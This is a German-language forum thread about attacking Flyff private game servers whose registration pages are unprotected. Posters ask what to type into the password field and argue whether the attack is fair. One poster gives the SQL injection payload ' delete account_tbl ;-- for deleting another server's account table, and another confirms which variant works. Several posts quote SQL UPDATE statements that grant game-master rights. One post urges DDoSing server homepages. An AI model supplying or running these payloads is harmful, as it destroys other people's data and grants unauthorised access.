Jop FlyForFantasy hat es gefixxt
[HowTo]Account_DBF auf einen anderen Server löschen
-
-
Werbung zur Unterstützung des Forums ( Bitte AddBlocker deaktivieren )
[COLOR="DarkOrange"]Is der Passwort egal den man eingibt?[/COLOR][COLOR="DarkOrange"]Wtf mach dir doch lieber ein GM acc usw xD
Ist der PW egal? >.<[/COLOR]FlyForFight
Es geht nbicht dort-.-
Die nehmen die Sonderzeichen raus...[COLOR="DarkOrange"]Und welchen PW muss man benutzen?[/COLOR]ich bumpe mal Foldercarp
seine frage!LiLo;69213 schrieb:
[FONT="Comic Sans MS"][COLOR="DarkOrange"][SIZE="2"]
spamm ftw?
relax, immerhin ist das hier ein Thread übers Server schädigen^^
Ich finds persöhnlich auch nicht toll, und würds nie machen, allerdings, wenn ein server sich nciht dagegen absichert, ist der server selbst schuld.[/SIZE][/COLOR][/FONT]
[COLOR="DarkOrange"]Fass dir mal selbst an die Nase und mecker nich.[/COLOR]-.- ihr habt kein gehirn !!!
1. zu blöd einen Server zu finden, der dies zulässt
2. ihr zerstört allen den Fun und was bringts ?!! nix !
Wenn ihr mich fragt würd ich den typen bannen !
so das wars mal von mir -.-
Böse GrüßeFoldercarp;70116 schrieb:
[COLOR="DarkOrange"]Und welchen PW muss man benutzen?[/COLOR]
Schließe mich seiner Frage an[FONT="Comic Sans MS"][COLOR="DarkOrange"][SIZE="2"]Iamthegame;70740 schrieb:
-.- ihr habt kein gehirn !!!
1. zu blöd einen Server zu finden, der dies zulässt
2. ihr zerstört allen den Fun und was bringts ?!! nix !
Wenn ihr mich fragt würd ich den typen bannen !
so das wars mal von mir -.-
Böse Grüße
öhm...wtf?
Also bitte <.< Wenn ein server DAS nicht fixxt, ist das Team selbst schuld, wenn auf einmal alles Hopps geht.[/SIZE][/COLOR][/FONT]ja klar ich mein nur die anfänger die sich freuen wenn sie die files mal laufen haben denen wird das direkt "am arsch" gemacht !
ich bin kein noob :D hab schon v15 ready ^.^
aber echt schon scheisse von denen die neue noob server crashenBeim Root Server könnt ihr ehh mit schön ärger rechnen ;)
Ausserdem habt ihr doch keien hobbys wenn ihr den ganzen tag den Vorstellngsbereich oder andere top list seiten durchforstet um auf einen hamachiserver zu stossen der das nix gefixxt hat.
Und dann noch zu blöd sein um zu wissen was man eingeben muss obwohls hier massig steht omg ~.~
Reallive ist 5m von euch entfernt und es beißt nich >.<
MFG[FONT="Comic Sans MS"][COLOR="SlateGray"][SIZE="2"]leute wenn ihr denn server downt machen wollt,ddost die hp und crasht den server >_>[/SIZE][/COLOR][/FONT]DDos, ist das schlimmste was man aufn root server anstellen kann, bekommste glatt ne anzeige -.-That's funny :>That´s Spamm ._.
<3 Aber dieser Thread is nutzlos xDD kuckt lieber im gesamten Guide der injections <.< ._.Frucht;68918 schrieb:
Um einen GM Account zu machen führe diesen Befehl aus:
USE [CHARACTER_01_DBF]
UPDATE CHARACTER_TBL SET m_chAuthority='Z'
WHERE m_szName='Dein Charname' and serverindex='01'
USE [ACCOUNT_DBF]
UPDATE ACCOUNT_TBL_DETAIL SET m_chLoginAuthority='Z'
WHERE account='Deine Account ID' and gamecode='A000'
soll das alles bei PW und bei ID eingeben und muss acc dann schon erstellt sein+chara
und muss man schreibn:
\\\' delete account_tbl ;--
oder
' delete account_tbl ;--[FONT="Tahoma"][COLOR="DarkOrange"][SIZE="2"]Akrio;79499 schrieb:
soll das alles bei PW und bei ID eingeben und muss acc dann schon erstellt sein+chara
und muss man schreibn:
\\\' delete account_tbl ;--
oder
' delete account_tbl ;--
Die zweite Variante.[/SIZE][/COLOR][/FONT]Zitat von Frucht Beitrag anzeigen
Um einen GM Account zu machen führe diesen Befehl aus:
USE [CHARACTER_01_DBF]
UPDATE CHARACTER_TBL SET m_chAuthority='Z'
WHERE m_szName='Dein Charname' and serverindex='01'
USE [ACCOUNT_DBF]
UPDATE ACCOUNT_TBL_DETAIL SET m_chLoginAuthority='Z'
WHERE account='Deine Account ID' and gamecode='A000'
afaik. muss der Account keinen "GM-Status" besitzen, da die Rechte pro Charakter verteilt werden.
Sprich:
USE [CHARACTER_01_DBF]
UPDATE CHARACTER_TBL SET m_chAuthority = 'Z' WHERE m_szName = 'Dein Charaktername'
reicht aus.
Funktioniert aber nur bei wenigen Registerpages. Und ich denke nicht, dass irgendein größerer, seriöser PServer diese "Lücke" offen lässt..-
Teilen
- Facebook 0
- Twitter 0
- Google Plus 0
- Reddit 0